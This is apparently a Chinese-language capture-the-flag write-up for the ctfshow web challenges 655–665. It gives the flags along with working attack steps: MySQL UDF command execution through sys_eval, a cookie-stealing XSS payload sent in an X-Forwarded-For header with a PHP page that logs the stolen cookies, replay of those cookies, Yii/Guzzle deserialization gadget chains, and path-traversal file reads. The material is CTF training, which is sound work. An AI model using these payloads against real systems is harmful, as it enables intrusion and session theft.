配合脚本学习效果更佳

web655

打开/etc/host得到内网地址，遍历一遍发现.5的存活e
后台扫描发现有phpinfo.php www.zip robots.txt
访问phpinfo.php直接拿到flag
在这里插入图片描述
flag_655=ctfshow{aada21bce99ddeab20020ac714686303}

create function sys_eval returns string soname ‘b.so’;
select sys_eval(‘whoami’);

web656

提示xss，审计index.php发现x-forwarded-for可以，但是xss需要搭在内网上。
随便创一个php页面，内容为

<?php
$parameter = $_SERVER["QUERY_STRING"];
file_put_contents("log.txt",$parameter);
?>

接着在数据库中执行如下语句

select sys_eval('sudo curl --header "X-Forwarded-For:<script>window.location.href=String.fromCharCode(104,116,116,112,58,47,47,49,55,50,46,50,46,49,56,54,46,52,47,115,121,115,116,101,109,51,54,100,47,100,98,47,97,46,112,104,112,63,115,61)+document.cookie;</script>" http://172.2.186.5/index.php?action=login\\&u=7723\\&p=345');

String.fromCharCode中的值是这么来的

s="http://172.2.186.4/system36d/db/a.php?s=" #当然每个人的内网地址可能不一样
a=''
for i in s:
    a=a+str(ord(i))+','
print(a)

过一会就可以看到生成了log.txt内容如下

PHPSESSID=f4s2tukhjk4h4s7tm6vodorg6
auth=ZmxhZ182NTY9Y3Rmc2hvd3tlMGI4MGQ2Yjk5ZDJiZGJhZTM2ZjEyMWY3OGFiZTk2Yn0=

auth解码就是flag656

flag_656=ctfshow{e0b80d6b99d2bdbae36f121f78abe96b}

web657

带上cookie去访问就可以得到flag，当然这个cookie一直变，要保证是最新的。

select sys_eval('sudo curl --header "Cookie:PHPSESSID=1mjkpmd6hofo45vnhiobl4of7l;auth=ZmxhZ182NTY9Y3Rmc2hvd3tlMGI4MGQ2Yjk5ZDJiZGJhZTM2ZjEyMWY3OGFiZTk2Yn0=" http://172.2.186.5/index.php?action=main\\&m=getFlag');

flag_657=ctfshow{2a73f8f87a58a13c23818fafd83510b1}

web658

通过yii的反序列化漏洞拿到的
参考链接
文件下载地址https://github.com/opis/closure

扫描二维码关注公众号，回复： 13743276 查看本文章

<?php
namespace Codeception\Extension{
    
    
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
    
    
        protected $output;
        private $processes = [];
        public function __construct(){
    
    
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo urlencode(serialize(new RunProcess()));
}

namespace Faker{
    
    
    class DefaultGenerator
{
    
    
    protected $default;

    public function __construct($default = null)
    {
    
    
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    
    
    use Faker\DefaultGenerator;
    final class AppendStream{
    
    
        private $streams = [];
        private $seekable = true;
        public function __construct(){
    
    
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
    
    
        private $remoteStream;
        public function __construct(){
    
    
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
    
    
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
    
    
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){
    
    phpinfo();highlight_file('/var/www/html/flag.php');phpinfo();};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

flag_658=ctfshow{98555a97cb23e7413d261142e65a674f}

web659

nginx目录穿越漏洞
在这里插入图片描述

flag_659=ctfshow{73c4213829f8b393b2082bacb4253cab}
顺便白给了个665
flag_665=ctfshow{35802d184dba134bdc8d0d23e09051f7}

web660

让管理员去访问action=login，他自己会传个flag过去。
然后去日志里面看下。
在这里插入图片描述

web661

1=echo file_get_contents("http://172.2.166.5/public../home/flag/secret.txt");

flag_661=ctfshow{d41c308e12fdecf7782eeb7c20f45352}

web662 web663

两个是同一个flag
爆破文件名

1=echo file_get_contents("http://172.2.166.5/public../home/www-data/creater.sh ");

就是说flag663在一个xxx.html中，前缀是三位数的十六进制
在这里插入图片描述

flag_663=ctfshow{fa5cc1fb0bfc986d1ef150269c0de197}

web664

<?php
namespace Codeception\Extension{
    
    
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
    
    
        protected $output;
        private $processes = [];
        public function __construct(){
    
    
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo urlencode(serialize(new RunProcess()));
}

namespace Faker{
    
    
    class DefaultGenerator
{
    
    
    protected $default;

    public function __construct($default = null)
    {
    
    
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    
    
    use Faker\DefaultGenerator;
    final class AppendStream{
    
    
        private $streams = [];
        private $seekable = true;
        public function __construct(){
    
    
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
    
    
        private $remoteStream;
        public function __construct(){
    
    
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
    
    
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
    
    
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){
    
    phpinfo();highlight_file('/var/oa/flag664.php');phpinfo();};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

flag_664=ctfshow{35802d184dba134bdc8d0d23e09051f7}

web665

看659

ctfshow终极考核web655-web665